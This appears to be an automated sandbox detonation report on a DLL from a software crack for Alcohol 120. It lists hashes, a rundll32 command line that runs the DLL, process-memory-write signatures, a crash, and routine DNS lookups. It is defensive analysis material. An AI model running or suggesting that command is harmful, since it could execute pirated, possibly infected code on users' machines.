MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4568 wrote to memory of 3652 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4568 wrote to memory of 3652 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4568 wrote to memory of 3652 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3652 -ip 3652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 668

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

N/A